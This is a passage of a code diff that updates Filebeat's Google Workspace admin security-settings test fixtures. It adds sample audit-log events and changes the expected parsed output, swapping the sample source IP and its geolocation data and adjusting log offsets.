+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"ALLOWED_TWO_STEP_VERIFICATION_METHOD","value":"ONLY_SECURITY_KEY"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"TOGGLE_CAA_ENABLEMENT","parameters":[{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_ERROR_MESSAGE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_APP_ASSIGNMENTS","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CAA_ASSIGNMENTS_NEW","value":"new"},{"name":"CAA_ASSIGNMENTS_OLD","value":"old"},{"name":"GROUP_NAME","value":"group"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"TRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ENFORCE_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"SESSION_CONTROL_SETTINGS_CHANGE","parameters":[{"name":"REAUTH_APPLICATION","value":"ADMIN_CONSOLE"},{"name":"REAUTH_SETTING_NEW","value":"INHERIT"},{"name":"REAUTH_SETTING_OLD","value":"NEVER"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_SESSION_LENGTH","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UNBLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"CALENDAR"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json
index 1af74f0a4dad..7ec4b2c168dd 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json
@@ -9,7 +9,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -26,23 +26,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -64,7 +60,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -77,26 +73,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 461,
+        "log.offset": 460,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -118,7 +110,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -131,26 +123,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 903,
+        "log.offset": 901,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -172,7 +160,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -188,26 +176,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1348,
+        "log.offset": 1345,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -228,7 +212,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -243,26 +227,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1903,
+        "log.offset": 1899,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -283,7 +263,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -298,26 +278,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2424,
+        "log.offset": 2419,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -338,7 +314,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -351,26 +327,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2950,
+        "log.offset": 2944,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -392,7 +364,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -409,26 +381,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 3383,
+        "log.offset": 3376,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -450,7 +418,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
